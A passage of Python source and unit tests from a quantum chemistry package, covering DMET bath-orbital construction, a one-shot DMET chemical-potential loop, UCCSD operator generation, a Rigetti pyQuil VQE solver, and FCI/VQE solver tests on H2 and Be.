onerdm_temp3 = onerdm_temp[temp_list[1]: , : ]
else:
# Determine the minimum and maximum orbitals for extraction
onerdm_temp = onerdm_matrix[ : , : temp_list[0]]
onerdm_temp2 = onerdm_matrix[ : , temp_list[1]: ]
onerdm_temp3 = np.hstack((onerdm_temp, onerdm_temp2))
onerdm_temp = onerdm_temp3[ : temp_list[0], : ]
onerdm_temp2 = onerdm_temp3[temp_list[1]: , : ]
onerdm_temp3 = np.vstack((onerdm_temp, onerdm_temp2))
return onerdm_temp3
def dmet_bath_orb_sort(t_list, e_before, c_before):
""" Sort the bath orbitals with the eigenvalues (orbital energies).
Args:
t_list (list): Number of [0] fragment & [1] bath orbitals (int).
e_before (numpy.array): Orbitals energies before sorting (float64).
c_before (numpy.array): Coefficients of the orbitals before sorting (float64).
Returns:
e_new (numpy.array): Sorted orbital energies (float64).
c_new (numpy.array): Coefficients of the sorted orbitals (float64).
"""
# Sort the orbital energies (Occupation of 1.0 should come first...)
new_index = np.maximum(-e_before, e_before - 2.0).argsort()
# Throw away some orbitals above threshold
thresh_orb = np.sum(-np.maximum(-e_before, e_before - 2.0)[new_index] > 1e-13)
# Determine the number of bath orbitals
norb = min(np.sum(thresh_orb), t_list[0])
t_list.append(norb)
# Sort the bath orbitals with its energies
e_new = e_before[new_index]
c_new = c_before[ : , new_index]
return e_new, c_new
def dmet_add_to_bath_orb( mol, t_list, temp_list, e_before, c_before ):
""" Add the frozen core part to the bath orbitals.
Args:
mol (pyscf.gto.Mole): The molecule to simulate (The full molecular system).
t_list (list): Number of [0] fragment & [1] bath orbitals (int).
temp_list (list): [0] Minimum and [1] maximum number for the active orbitals (int).
e_before (numpy.array): Orbital energy before addition of frozen core (float64).
c_before (numpy.array): Coefficients of the orbitals before addition of frozen core (float64).
Returns:
c_before (numpy.array): Constructed bath orbitals (float64).
e_occupied_core_orbitals (numpy.array): Orbital energies (float64).
"""
    # Copy the bath orbitals and energies before adding the core
add_e = - e_before[t_list[1]: ]
add_c = c_before[ : , t_list[1]: ]
new_index = add_e.argsort()
# Sort the orbitals based on its energies
c_before[ : , t_list[1]: ] = add_c[ : , new_index]
add_e = - add_e[new_index]
# The orbital energies with core part
norbital_total = mol.nao_nr()
e_occupied_core_orbitals = np.hstack((np.zeros([t_list[0] + t_list[1]]), add_e))
# Add the core part in the orbitals
for orb in range(0, t_list[0]):
c_before = np.insert(c_before, orb, 0.0, axis=1)
i_temp = 0
for orb_total in range( 0, norbital_total ):
if ((orb_total >= temp_list[0]) and (orb_total < temp_list[1])):
c_before = np.insert(c_before, orb_total, 0.0, axis=0)
c_before[orb_total, i_temp] = 1.0
i_temp += 1
return c_before, e_occupied_core_orbitals
```
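Of the helpers above, `dmet_onerdm_embed` only needs the total orbital count from `mol`, so its block extraction can be checked in isolation with a stub molecule. A toy sketch (assumes the module is importable at the path the test suite uses, `openqemist.problem_decomposition.dmet._helpers.dmet_bath`; the real caller passes a `pyscf.gto.Mole`):
```python
# Toy check of dmet_onerdm_embed: with a fragment on orbitals 0..1 of a
# 4-orbital system (temp_list = [0, 2]), the environment block (rows/cols 2..3)
# of the low-level one-particle RDM is extracted.
import numpy as np
from openqemist.problem_decomposition.dmet._helpers.dmet_bath import dmet_onerdm_embed
class StubMol:
    def nao_nr(self):
        return 4
onerdm = np.arange(16, dtype=float)  # stands in for a flattened 4x4 RDM
print(dmet_onerdm_embed(StubMol(), [0, 2], onerdm))
# [[10. 11.]
#  [14. 15.]]
```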
#### File: dmet/_helpers/dmet_oneshot_loop.py
```python
import numpy as np
import scipy.optimize
from dmet_bath import dmet_fragment_bath
from dmet_onerdm import dmet_low_rdm, dmet_fragment_rdm
from dmet_scf_guess import dmet_fragment_guess
from dmet_scf import dmet_fragment_scf
from dmet_cc_classical import dmet_fragment_cc_classical
from dmet_cc_quantum import dmet_fragment_cc_quantum
def dmet_oneshot_exe(input_dmet, dmet_orbs, orb_list, orb_list2):
"""
This is the code for one-shot DMET calculation
:param input_dmet: The dmet input object (dmet_input class)
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:return: DMET energy and chemical potential
"""
# Initialize chemical potential
chemical_potential=0.0
# Optimize the DMET energy and chemical potential
dmet_energy, chemical_potential = dmet_chemical_potential(input_dmet, dmet_orbs, orb_list, orb_list2, chemical_potential)
print(' \t*** DMET Cycle Done *** ')
print(' \tDMET Energy ( a.u. ) = '+'{:17.10f}'.format(dmet_energy))
print(' \tChemical Potential = '+'{:17.10f}'.format(chemical_potential))
print(' ')
return dmet_energy, chemical_potential
def dmet_chemical_potential(input_dmet, dmet_orbs, orb_list, orb_list2, chemical_potential):
"""
Initialize the SCF loop for the chemical potential
    In one-shot DMET calculations, the iteration continues until the electron-number difference converges to 0
:param input_dmet: The dmet input object (dmet_input class)
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:param chemical_potential: the chemical potential to be optimized =0 (for consistency over the entire system)
:return: DMET energy and chemical potential
"""
# Initialize the energy list and SCF procedure employing newton-raphson algorithm
energy = []
chemical_potential = scipy.optimize.newton(dmet_num_electron, chemical_potential, args = (input_dmet, dmet_orbs, orb_list, orb_list2, energy))
# Get the final energy value
niter = len(energy)
dmet_energy = energy[niter-1]
return dmet_energy, chemical_potential
def dmet_num_electron(chemical_potential, input_dmet, dmet_orbs, orb_list, orb_list2, energy_list):
"""
Obtain the difference of the number of electrons of the DMET calculation by summing up the trace of RDM for each calculation
:param input_dmet: The dmet input object (dmet_input class)
:param chemical_potential: The chemical potential in the previous iteration
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:param energy_list: List of the DMET energies (For each iteration)
:return: The difference of the number of electrons
"""
# Print the iteration number
niter = len(energy_list)+1
print(" \tIteration = ", niter)
print(' \t----------------')
print(' ')
# Obtain the number of electrons from DMET calculations
num_electron_temp = dmet_frag_loop(input_dmet, dmet_orbs, orb_list, orb_list2, energy_list, chemical_potential)
print(" \tNumber of Active Electrons = ", dmet_orbs.number_active_electrons)
print(" \tNumber of the Sum of Electrons = "+'{:12.8f}'.format(num_electron_temp))
# Obtain the difference of the number of electrons
number_of_electron_difference = num_electron_temp - dmet_orbs.number_active_electrons
print(" \tElectron Number Difference = "+'{:12.8f}'.format(number_of_electron_difference))
print(' ')
return number_of_electron_difference
def dmet_frag_loop(input_dmet, dmet_orbs, orb_list, orb_list2, energy_list, chemical_potential):
"""
The main loop of the one-shot DMET calculation
:param input_dmet: The dmet input object (dmet_input class)
:param dmet_orbs: The dmet orbs object (from dmet_orbitals)
:param orb_list: The number of orbitals for each DMET calculation
:param orb_list2: Lists of the minimum and maximum of the IAO label for each DMET calculation
:param energy_list: List of the DMET energies (For each iteration)
:param chemical_potential: The chemical potential in the previous iteration
:return: Number of electrons (sum of trace of the RDMs over each fragment)
"""
# Obtain the one particle RDM from low-level calculation of the entire system
onerdm_low = dmet_low_rdm(dmet_orbs.active_fock, dmet_orbs.number_active_electrons)
# Initialize some parameters
energy_temp = 0.0
number_of_electron = 0.0
# Loop over each fragment
for i, norb in enumerate(orb_list):
print("\t\tFragment Number : # ", i+1)
print('\t\t------------------------')
t_list=[]
t_list.append(norb)
temp_list = orb_list2[i]
# Construct bath orbitals
bath_orb, e_occupied = dmet_fragment_bath(dmet_orbs.mol_full, t_list, temp_list, onerdm_low)
# Obtain one particle rdm for a fragment
norb_high, nelec_high, onerdm_high = dmet_fragment_rdm(t_list, bath_orb, e_occupied, dmet_orbs.number_active_electrons)
# Calculate matrices for the Hamiltonian of a fragment
one_ele, fock, two_ele = dmet_orbs.dmet_fragment_hamiltonian(bath_orb, norb_high, onerdm_high)
# Construct guess orbitals for fragment SCF calculations
print("\t\tNumber of Orbitals ",norb_high)
print("\t\tNumber of Electrons ",nelec_high)
guess_orbitals = dmet_fragment_guess(t_list, bath_orb, chemical_potential, norb_high, nelec_high, dmet_orbs.active_fock)
# Carry out SCF calculation for a fragment
mf_fragments, fock_frag_copy, mol_frag = dmet_fragment_scf(t_list, two_ele, fock, nelec_high, \
norb_high, guess_orbitals, chemical_potential)
if mf_fragments.converged:
print("\t\tSCF Converged ")
else:
print("\t\tSCF NOT CONVERGED !!!")
exit()
print("\t\tSCF Energy = "+'{:17.10f}'.format(mf_fragments.e_tot))
# Perform high-level CC calculation for a fragment and calculate energy for a fragment
# Perform quantum simulation
if(input_dmet.quantum == 1):
print("norb_high = ",norb_high)
print("nelec_high = ",nelec_high)
fragment_energy, onerdm_frag, total_energy, total_energy_rdm = dmet_fragment_cc_quantum(input_dmet, mf_fragments, fock_frag_copy, t_list, one_ele, two_ele, fock, norb_high, nelec_high, mol_frag)
# Perform classical simulation
else:
fragment_energy, onerdm_frag, total_energy, total_energy_rdm = dmet_fragment_cc_classical(mf_fragments, fock_frag_copy, t_list, one_ele, two_ele, fock)
print("\t\tECCSD ( Conventional ) = "+'{:17.10f}'.format(total_energy))
print("\t\tECCSD ( RDM ) = "+'{:17.10f}'.format(total_energy_rdm))
# Sum up the energy
energy_temp += fragment_energy
# Sum up the number of electrons
number_of_electron += np.trace(onerdm_frag[ : t_list[0], : t_list[0]])
# Print the results
print("\t\tFragment Energy = "+'{:17.10f}'.format(fragment_energy))
print("\t\tNumber of Electrons in Fragment = "+'{:17.10f}'.format(np.trace(onerdm_frag)))
print('')
# add core constant terms to the energy
energy_temp += dmet_orbs.core_constant_energy
energy_list.append(energy_temp)
return number_of_electron
```
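The chemical-potential search above is a plain root-finding problem: `scipy.optimize.newton` varies the chemical potential until `dmet_num_electron` (the electron-number mismatch) returns zero. The same pattern in isolation, with a toy objective in place of the DMET one:
```python
# Toy illustration of the root-finding pattern used by dmet_chemical_potential.
import scipy.optimize
def electron_number_difference(mu):
    # Stand-in for dmet_num_electron: a monotone function of mu with a single root.
    return 2.0 * mu - 0.5
mu_opt = scipy.optimize.newton(electron_number_difference, x0=0.0)
print(mu_opt)  # ~0.25, where the mismatch vanishes
```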
#### File: quantum_solvers/microsoft_qsharp/generate_uccsd_operators.py
```python
import itertools
def complex_as_dict(re, im):
import cmath
x = complex(re, im)
return {'Real': re, 'Imaginary': im, 'Magnitude': abs(x), 'Phase': cmath.phase(x)}
def alpha_spinorbital(MO):
''' Return the corresponding alpha spinorbital index given a molecular orbital (MO) index
Args:
MO(int): molecular orbital index
Returns:
(2*MO)(int): alpha spin-orbital index
'''
return 2*MO
def beta_spinorbital(MO):
''' Return the corresponding beta spinorbital index given a molecular orbital (MO) index
Args:
MO(int): molecular orbital index
Returns:
(2*MO + 1)(int): beta spin-orbital index
'''
return 2 * MO + 1
def count_amplitudes(n_spinorbitals,n_electrons):
"""Count the number of singles and doubles amplitudes for a given UCCSD-VQE run
Args:
n_spinorbitals(int): integer representing the number of spinorbitals (qubits) for
a given molecule and basis set
n_electrons(int): integer representing the number of electrons for a given molecule
Returns:
n_amplitudes(int): integer representing the total number of amplitudes (MO basis)
"""
# Compute the number of MOs and the number of occupied and virtual MOs
n_MO = n_spinorbitals // 2
n_occ = n_electrons // 2
n_virt = n_MO - n_occ
# Compute the number of singles and doubles amplitudes
n_singles = n_occ*n_virt
n_doubles = n_singles*(n_singles + 1) // 2
return n_singles + n_doubles
def compute_cluster_operator(n_spinorbitals, n_electrons, amplitudes, multiply=False, operator = []):
"""Compute or update the cluster operator for a given UCCSD-VQE run
n_spinorbitals(int): integer representing the number of spinorbitals (qubits) for
a given molecule and basis set
n_electrons(int): integer representing the number of electrons for a given molecule
amplitudes(list): list of the amplitudes, with the singles appearing first, followed
by the diagonal (i,i,a,a) doubles and then the off-diagonal (i,j,a,b)
doubles
multiply(bool): optional boolean to indicate whether we are performing an amplitude
update (i.e. multiplying a new set of amplitudes by the corresponding
operators) or not
operator(list): optional list of the contributions to the cluster operator
Returns:
ref(tuple): tuple of tuples representing the reference configuration
t(list): list of tuples representing the cluster operator
"""
# Compute the number of MOs and the number of occupied and virtual MOs
n_MO = n_spinorbitals // 2
n_occ = n_electrons // 2
n_virt = n_MO - n_occ
# Extract the singles amplitudes and diagonal doubles amplitudes
singles = amplitudes[:(n_occ*n_virt)]
doubles_diag = amplitudes[(n_occ*n_virt):(2*n_occ*n_virt)]
doubles_offdiag = amplitudes[(2*n_occ*n_virt):]
# Spin indexing
spin_index = [alpha_spinorbital, beta_spinorbital]
# -------------------------------------------------------
# Reference configuration
# -------------------------------------------------------
#Loop over occupied orbitals
li = []
j = 0
for i in range(n_occ):
# Define alpha and beta spinorbitals
i_a = alpha_spinorbital(i)
i_b = beta_spinorbital(i)
if(multiply):
li += [i_a,i_b]
else:
li += [('u',i_a), ('u', i_b)]
# Define the reference state
if(multiply):
ref = ((1.0,0.0),li)
#ref = (li,1)
else:
#ref = ((1.0, 0.0),(li,1))
ref = (li,1)
t = []
# -------------------------------------------------------
# Single excitations and diagonal double excitations
# -------------------------------------------------------
# Loop over occupied and virtual orbitals
for i, (m,n) in enumerate(itertools.product(range(n_virt),range(n_occ))):
# n labels virtual orbitals (offset of n_occ)
m += n_occ
# Loop over spin
for spin in range(2):
# Mapping of spatial orbitals to spin-orbitals
ind_1 = spin_index[spin]
ind_2 = spin_index[1-spin]
# Define spin-orbital labels
m_1 = ind_1(n)
m_2 = ind_2(n)
n_1 = ind_1(m)
n_2 = ind_2(m)
if(multiply):
# Multiply the singles operators by the correct amplitudes
t += [((singles[i], 0.0), operator[j][1])]
#t += [(operator[j][1], complex_as_dict(singles[i],0.0))]
j += 1
# Multiply the diagonal doubles operators by the correct amplitudes
if(m_1 != m_2 and n_1 != n_2):
t += [((doubles_diag[i], 0.0), operator[j][1])]
j += 1
else:
# Generate the singles excitations in the proper format
t += [(([('u',n_1),('d',m_1)],1), complex_as_dict(singles[i],0.0))]
# Generate the diagonal doubles excitations in the proper format
if(m_1 != m_2 and n_1 != n_2):
t += [(([('u',n_1),('u',n_2),('d',m_1),('d',m_2)],1), complex_as_dict(doubles_diag[i],0.0))]
# Loop over unique off-diagonal doubles
for i, ((m,u),(n,v)) in enumerate(itertools.combinations(
itertools.product(range(n_virt),range(n_occ)),2)
):
# m and n label virtual orbitals (offset of n_occ)
m += n_occ
n += n_occ
# Loop over spin
for (spin_1, spin_2) in itertools.product(range(2), repeat=2):
# Mapping of spatial orbitals to spin-orbitals
ind_1 = spin_index[spin_1]
ind_2 = spin_index[spin_2]
# Define spin-orbital labels
m_1 = ind_1(u)
m_2 = ind_2(v)
n_1 = ind_1(m)
n_2 = ind_2(n)
if(multiply):
# Multiply the off-diagonal doubles excitation operators by the correct amplitudes
if(m_1 != m_2 and n_1 != n_2):
t += [((1.0*doubles_offdiag[i],0.0), operator[j][1])]
j += 1
else:
# Generate the off-diagonal doubles excitations in the proper format
if(m_1 != m_2 and n_1 != n_2):
t += [(([('u',n_1),('u',n_2),('d',m_1),('d',m_2)],1), complex_as_dict(doubles_offdiag[i],0.0))]
# If multiply is true, then append the reference configuration to t
if (multiply): t += [ref]
return ref, t
```
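For a closed-shell reference, the count above reduces to n_occ·n_virt singles plus n_singles(n_singles+1)/2 doubles. A quick worked check against the H2/STO-3G case used in the tests further below (4 spin-orbitals, 2 electrons), which indeed has two UCCSD amplitudes:
```python
# Worked example of count_amplitudes(4, 2) for H2 in STO-3G.
n_MO, n_occ = 4 // 2, 2 // 2                  # 2 molecular orbitals, 1 occupied
n_virt = n_MO - n_occ                         # 1 virtual
n_singles = n_occ * n_virt                    # 1
n_doubles = n_singles * (n_singles + 1) // 2  # 1
print(n_singles + n_doubles)                  # 2, matching len(amplitudes_H2) in the tests
```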
#### File: quantum_solvers/rigetti/rigetti_parametric_solver.py
```python
from enum import Enum
import warnings
import numpy as np
from pyscf import ao2mo, mp, scf
from openfermion.transforms import jordan_wigner
from openfermion.hamiltonians import MolecularData
from openfermionprojectq import uccsd_trotter_engine, uccsd_singlet_evolution
from openfermion.utils import uccsd_singlet_paramsize, uccsd_singlet_generator
from pyquil.quil import Program, Pragma
from pyquil.paulis import exponentiate, commuting_sets, sX, sY, sZ, sI
from pyquil.gates import *
from pyquil.api import WavefunctionSimulator, get_qc
from pyquil.experiment import ExperimentSetting, TomographyExperiment, TensorProductState
from forestopenfermion import qubitop_to_pyquilpauli
from ..parametric_quantum_solver import ParametricQuantumSolver
class RigettiParametricSolver(ParametricQuantumSolver):
"""Performs an energy estimation for a molecule with a parametric circuit.
Performs energy estimations for a given molecule and a choice of ansatz
circuit that is supported.
    Uses the UCCSD ansatz for state preparation within the VQE-style energy estimation.
    PySCF is used to compute the mean-field reference.
Users can also provide a function that takes a `pyscf.gto.Mole`
as its first argument and `pyscf.scf.RHF` as its second.
Attributes:
optimized_amplitudes (list): The optimized UCCSD amplitudes.
of_mole (openfermion.hamiltonian.MolecularData): Molecular Data in Openfermion.
f_hamiltonian (openfermion.ops.InteractionOperator): Fermionic Hamiltonian.
qubit_hamiltonian (openfermion.transforms.jordan_wigner): Qubit Hamiltonian.
n_qubits (int): Number of qubits.
"""
class Ansatze(Enum):
""" Enumeration of the ansatz circuits that are supported."""
UCCSD = 0
def __init__(self, ansatz, molecule, mean_field = None,
backend_options = {"backend":"wavefunction_simulator"}):
"""Initialize the settings for simulation.
If the mean field is not provided it is automatically calculated.
Args:
ansatz (OpenFermionParametricSolver.Ansatze): Ansatz for the quantum solver.
molecule (pyscf.gto.Mole): The molecule to simulate.
mean_field (pyscf.scf.RHF): The mean field of the molecule.
"""
# Check the ansatz
assert(isinstance(ansatz, RigettiParametricSolver.Ansatze))
self.ansatz = ansatz
# Calculate the mean field if the user has not already done it.
if not mean_field:
mean_field = scf.RHF(molecule)
mean_field.verbose = 0
mean_field.scf()
if not mean_field.converged:
orb_temp = mean_field.mo_coeff
occ_temp = mean_field.mo_occ
nr = scf.newton(mean_field)
energy = nr.kernel(orb_temp, occ_temp)
mean_field = nr
# Check the convergence of the mean field
if not mean_field.converged:
warnings.warn("RigettiParametricSolver simulating with mean field not converged.",
RuntimeWarning)
self.molecule = molecule
self.mean_field = mean_field
# Initialize the amplitudes (parameters to be optimized)
self.optimized_amplitudes = []
# Set the parameters for Openfermion
self.of_mole = self._build_of_molecule(molecule, mean_field)
# Set the fermionic Hamiltonian
self.f_hamiltonian = self.of_mole.get_molecular_hamiltonian()
# Transform the fermionic Hamiltonian into qubit Hamiltonian
self.qubit_hamiltonian = jordan_wigner(self.f_hamiltonian)
self.qubit_hamiltonian.compress()
# Also stores the Rigetti/Forest qubit Hamiltonian
self.forest_qubit_hamiltonian = qubitop_to_pyquilpauli(self.qubit_hamiltonian)
# Set the dimension of the amplitudes
if ansatz == RigettiParametricSolver.Ansatze.UCCSD:
no_occupied = int(np.ceil(molecule.nelectron / 2))
no_virtual = len(mean_field.mo_energy) - no_occupied
no_t1 = no_occupied * no_virtual
no_t2 = no_t1 * (no_t1 + 1) / 2
self.amplitude_dimension = int(no_t1 + no_t2)
# Set the number of qubits
self.n_qubits = self.of_mole.n_qubits
# Instantiate backend for computation
self.backend_options = dict()
if ("backend" in backend_options) and (backend_options["backend"] != "wavefunction_simulator"):
self.backend_options["backend"] = get_qc(backend_options["backend"])
else:
self.backend_options["backend"] = WavefunctionSimulator()
self.backend_options["n_shots"] = backend_options["n_shots"] if ("n_shots" in backend_options) else 1000
def simulate(self, amplitudes):
"""Perform the simulation for the molecule.
Args:
amplitudes (list): The initial amplitudes (float64).
Returns:
float64: The total energy (energy).
Raise:
ValueError: If the dimension of the amplitude list is incorrect.
"""
if len(amplitudes) != self.amplitude_dimension:
raise ValueError("Incorrect dimension for amplitude list.")
#Anti-hermitian operator and its qubit form
generator = uccsd_singlet_generator(amplitudes, self.of_mole.n_qubits, self.of_mole.n_electrons)
jw_generator = jordan_wigner(generator)
pyquil_generator = qubitop_to_pyquilpauli(jw_generator)
p = Program(Pragma('INITIAL_REWIRING', ['"GREEDY"']))
# Set initial wavefunction (Hartree-Fock)
for i in range(self.of_mole.n_electrons):
p.inst(X(i))
# Trotterization (unitary for UCCSD state preparation)
for term in pyquil_generator.terms :
term.coefficient = np.imag(term.coefficient)
p += exponentiate(term)
p.wrap_in_numshots_loop(self.backend_options["n_shots"])
# Do not simulate if no operator was passed
if len(self.qubit_hamiltonian.terms) == 0:
return 0.
else:
# Run computation using the right backend
if isinstance(self.backend_options["backend"], WavefunctionSimulator):
energy = self.backend_options["backend"].expectation(prep_prog=p, pauli_terms=self.forest_qubit_hamiltonian)
else:
# Set up experiment, each setting corresponds to a particular measurement basis
settings = [ExperimentSetting(in_state=TensorProductState(), out_operator=forest_term) for forest_term in self.forest_qubit_hamiltonian.terms]
experiment = TomographyExperiment(settings=settings, program=p)
print(experiment, "\n")
results = self.backend_options["backend"].experiment(experiment)
energy = 0.
coefficients = [forest_term.coefficient for forest_term in self.forest_qubit_hamiltonian.terms]
for i in range(len(results)):
energy += results[i].expectation * coefficients[i]
energy = np.real(energy)
# Save the amplitudes so we have the optimal ones for RDM calculation
self.optimized_amplitudes = amplitudes
return energy
def get_rdm(self):
"""Obtain the RDMs from the optimized amplitudes.
Obtain the RDMs from the optimized amplitudes by using the
same function for energy evaluation.
The RDMs are computed by using each fermionic Hamiltonian term,
transforming them and computing the elements one-by-one.
Note that the Hamiltonian coefficients will not be multiplied
as in the energy evaluation.
The first element of the Hamiltonian is the nuclear repulsion
energy term, not the Hamiltonian term.
Returns:
(numpy.array, numpy.array): One & two-particle RDMs (rdm1_np & rdm2_np, float64).
Raises:
RuntimeError: If no simulation has been run.
"""
if len(self.optimized_amplitudes) == 0:
raise RuntimeError("Cannot retrieve RDM because no simulation has been run.")
# Save our accurate hamiltonian
tmp_hamiltonian = self.qubit_hamiltonian
# Initialize the RDM arrays
rdm1_np=np.zeros((self.of_mole.n_orbitals,)*2)
rdm2_np=np.zeros((self.of_mole.n_orbitals,)*4)
# Loop over each element of Hamiltonian (non-zero value)
for ikey,key in enumerate(self.f_hamiltonian):
length=len(key)
# Treat one-body and two-body term accordingly
if(length==2):
pele, qele = int(key[0][0]), int(key[1][0])
iele, jele = pele//2, qele//2
if(length==4):
pele, qele, rele, sele = int(key[0][0]), int(key[1][0]), int(key[2][0]), int(key[3][0])
iele, jele, kele, lele = pele//2, qele//2, rele//2, sele//2
# Select the Hamiltonian element (Set coefficient to one)
hamiltonian_temp = self.of_mole.get_molecular_hamiltonian()
for jkey,key2 in enumerate(hamiltonian_temp):
hamiltonian_temp[key2] = 1. if (key == key2 and ikey !=0) else 0.
# Qubitize the element
qubit_hamiltonian2 = jordan_wigner(hamiltonian_temp)
qubit_hamiltonian2.compress()
# Overwrite with the temp hamiltonian
self.qubit_hamiltonian = qubit_hamiltonian2
self.forest_qubit_hamiltonian = qubitop_to_pyquilpauli(self.qubit_hamiltonian)
# Calculate the energy with the temp hamiltonian
opt_energy2 = self.simulate(self.optimized_amplitudes)
# Put the values in np arrays (differentiate 1- and 2-RDM)
if(length==2):
rdm1_np[iele,jele] = rdm1_np[iele,jele] + opt_energy2
elif(length==4):
if((iele!=lele) or (jele!=kele)):
rdm2_np[lele,iele,kele,jele] = rdm2_np[lele,iele,kele,jele] + 0.5 * opt_energy2
rdm2_np[iele,lele,jele,kele] = rdm2_np[iele,lele,jele,kele] + 0.5 * opt_energy2
else:
rdm2_np[iele,lele,jele,kele] = rdm2_np[iele,lele,jele,kele] + opt_energy2
# Restore the accurate hamiltonian
self.qubit_hamiltonian = tmp_hamiltonian
return rdm1_np, rdm2_np
def default_initial_var_parameters(self):
""" Returns initial variational parameters for a VQE simulation.
Returns initial variational parameters for the circuit that is generated
for a given ansatz.
Returns:
list: Initial parameters.
"""
if self.ansatz == self.__class__.Ansatze.UCCSD:
from .._variational_parameters import mp2_variational_parameters
return mp2_variational_parameters(self.molecule, self.mean_field)
else:
raise RuntimeError("Unsupported ansatz for automatic parameter generation")
def _build_of_molecule(self, molecule, mean_field):
"""Initialize the instance of Openfermion MolecularData class.
Interface the pyscf and Openfermion data.
`pyscf.ao2mo` is used to transform the AO integrals into
the MO integrals.
Args:
molecule (pyscf.gto.Mole): The molecule to simulate.
mean_field (pyscf.scf.RHF): The mean field of the molecule.
Returns:
openfermion.hamiltonian.MolecularData: Molecular Data in Openfermion (of_mole).
"""
of_mole = MolecularData(geometry=molecule.atom, basis=molecule.basis,
multiplicity=molecule.spin + 1)
of_mole.mf = mean_field
of_mole.mol = molecule
of_mole.n_atoms = molecule.natm
        of_mole.atoms = [row[0] for row in molecule.atom]
of_mole.protons = 0
of_mole.nuclear_repulsion = molecule.energy_nuc()
of_mole.charge = molecule.charge
of_mole.n_electrons = molecule.nelectron
of_mole.n_orbitals = len(mean_field.mo_energy)
of_mole.n_qubits = 2 * of_mole.n_orbitals
of_mole.hf_energy = mean_field.e_tot
of_mole.orbital_energies = mean_field.mo_energy
of_mole.mp2_energy = None
of_mole.cisd_energy = None
of_mole.fci_energy = None
of_mole.ccsd_energy = None
of_mole.general_calculations = {}
of_mole._canonical_orbitals = mean_field.mo_coeff
of_mole._overlap_integrals = mean_field.get_ovlp()
of_mole.h_core = mean_field.get_hcore()
of_mole._one_body_integrals = of_mole._canonical_orbitals.T @ of_mole.h_core @ of_mole._canonical_orbitals
twoint = mean_field._eri
eri = ao2mo.restore(8, twoint, of_mole.n_orbitals)
eri = ao2mo.incore.full(eri, of_mole._canonical_orbitals)
eri = ao2mo.restore(1, eri, of_mole.n_orbitals)
of_mole._two_body_integrals = np.asarray(eri.transpose(0,2,3,1), order='C')
return of_mole
```
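A minimal end-to-end sketch of the solver above, mirroring the Q#/Qiskit tests further down. This is a usage assumption rather than package documentation: it assumes `RigettiParametricSolver` is exported from `openqemist.quantum_solvers` like the other backends, that pyscf and pyQuil are installed, and that a Forest QVM/compiler is available for the default `WavefunctionSimulator` backend; the two amplitudes are placeholders, not optimized values:
```python
# Hypothetical usage sketch for RigettiParametricSolver.
from pyscf import gto
from openqemist.quantum_solvers import RigettiParametricSolver
mol = gto.Mole()
mol.atom = "H 0.0 0.0 0.0; H 0.0 0.0 0.74137727"
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
ansatz = RigettiParametricSolver.Ansatze.UCCSD
solver = RigettiParametricSolver(ansatz, mol)  # defaults to the wavefunction simulator
print(solver.amplitude_dimension)              # 2 variational parameters for H2/STO-3G
energy = solver.simulate([0.0, 0.05])          # placeholder amplitudes
one_rdm, two_rdm = solver.get_rdm()
print(energy)
```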
#### File: electronic_structure_solvers/fci_solver/test_fci_solver.py
```python
import unittest
from pyscf import gto, scf
from openqemist.electronic_structure_solvers import FCISolver
H2 = """
H 0.00 0.00 0.0
H 0.00 0.00 0.74137727
"""
Be = """Be 0.0 0.0 0.0"""
class FCISolverTest(unittest.TestCase):
def test_h2_no_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field not calculated."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = FCISolver()
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.1478300596229851, places=8)
#TODO: test RDM here
def test_h2_with_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field calculated and passed in."""
mol = gto.Mole()
mol.atom = H2
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
solver = FCISolver()
energy = solver.simulate(mol, mf)
self.assertAlmostEqual(energy, -1.1478300596229851, places=8)
#TODO: test RDM here
def test_be_no_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field not calculated."""
mol = gto.Mole()
mol.atom = Be
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = FCISolver()
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -14.531444379108095, places=8)
#TODO: test RDM here
def test_be_with_mf(self):
""" Test the FCISolver against result from reference implementation with
mean field calculated and passed in."""
mol = gto.Mole()
mol.atom = Be
mol.basis = "3-21g"
mol.charge = 0
mol.spin = 0
mol.build()
mf = scf.RHF(mol)
mf.verbose = 0
mf.scf()
solver = FCISolver()
energy = solver.simulate(mol, mf)
self.assertAlmostEqual(energy, -14.531444379108095, places=8)
#TODO: test RDM here
def test_get_rdm_without_simulate(self):
"""Test that the runtime error is raised when user calls get RDM without
first running a simulation."""
solver = FCISolver()
self.assertRaises(RuntimeError, solver.get_rdm);
if __name__ == "__main__":
unittest.main()
```
#### File: electronic_structure_solvers/vqe_solver/test_vqe_solver_qiskit.py
```python
import unittest
from pyscf import gto, scf
from openqemist.electronic_structure_solvers import VQESolver, FCISolver
from openqemist.quantum_solvers import QiskitParametricSolver
H2 = [['H', [0.0, 0.0, 0.0]], ['H', [0.0, 0.0, 0.74137727]]]
H4 = [['H', [0.7071067811865476, 0.0, 0.0]],
['H', [0.0, 0.7071067811865476, 0.0]],
['H', [-1.0071067811865476, 0.0, 0.0]],
['H', [0.0, -1.0071067811865476, 0.0]]]
class VQESolverTest(unittest.TestCase):
def test_h2_sto3g(self):
""" Test the converged energy of VQE with no initial variational parameters
provided by the user """
mol = gto.Mole()
mol.atom = H2
mol.basis = "sto-3g"
mol.charge = 0
mol.spin = 0
mol.build()
solver = VQESolver()
solver.hardware_backend_type = QiskitParametricSolver
solver.ansatz_type = QiskitParametricSolver.Ansatze.UCCSD
energy = solver.simulate(mol)
self.assertAlmostEqual(energy, -1.1372704178510415, delta=1e-3)
@unittest.skip("Pending faster implementation of get_rdm.")
def test_h2_321g(self):
""" Test the converged energy of VQE with initial variational parameters
provided by the user """
